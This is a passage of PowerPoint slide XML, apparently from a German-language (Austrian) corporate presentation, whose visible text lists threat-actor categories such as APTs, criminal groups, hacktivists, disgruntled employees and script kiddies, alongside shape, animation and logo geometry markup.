              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB06FF02-5B5F-45F1-6EAC-DC83F2F41D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119336" y="2325365"/>
            <a:ext cx="4350307" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APTs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546B1041-45BA-DBF9-1270-A21C2275D08F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-60684" y="4559726"/>
            <a:ext cx="7715450" cy="2368930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:lumMod val="5000"/>
                  <a:lumOff val="95000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="45000"/>
                  <a:lumOff val="55000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="73000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="45000"/>
                  <a:lumOff val="55000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">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sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Textfeld 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60588E18-C9DE-55E4-4CB8-7313C0CEDE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119337" y="6307307"/>
            <a:ext cx="11856214" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kiddie”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Textfeld 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A443D07-28D6-2C3C-2466-A1E390CCF91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119336" y="5506604"/>
            <a:ext cx="10387445" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kleinkriminelle, Unzufriedene Angestellte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Textfeld 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164EF720-7C5D-FA71-AB70-16F0C0083268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119336" y="4754600"/>
            <a:ext cx="8831575" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verbrechergruppen, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacktivisten</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826DAC55-9E3F-F1DF-EE2B-B55F50FD6FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237132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0" grpId="0" animBg="1"/>
      <p:bldP spid="71" grpId="0" animBg="1"/>
      <p:bldP spid="72" grpId="0" animBg="1"/>
      <p:bldP spid="73" grpId="0" animBg="1"/>
      <p:bldP spid="78" grpId="0"/>
      <p:bldP spid="79" grpId="0"/>
      <p:bldP spid="80" grpId="0"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="76"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smic Microwave Background (CMB)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25FFA0F-6E50-6BC5-91A0-AC1334E93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A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5DE72B-042A-FB70-1786-6385FD5F8B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freihandform: Form 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE92336-E2A0-7C48-689B-A26703B01635}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freihandform: Form 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533B529C-65F5-9DFB-AC20-D0D7C75185A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
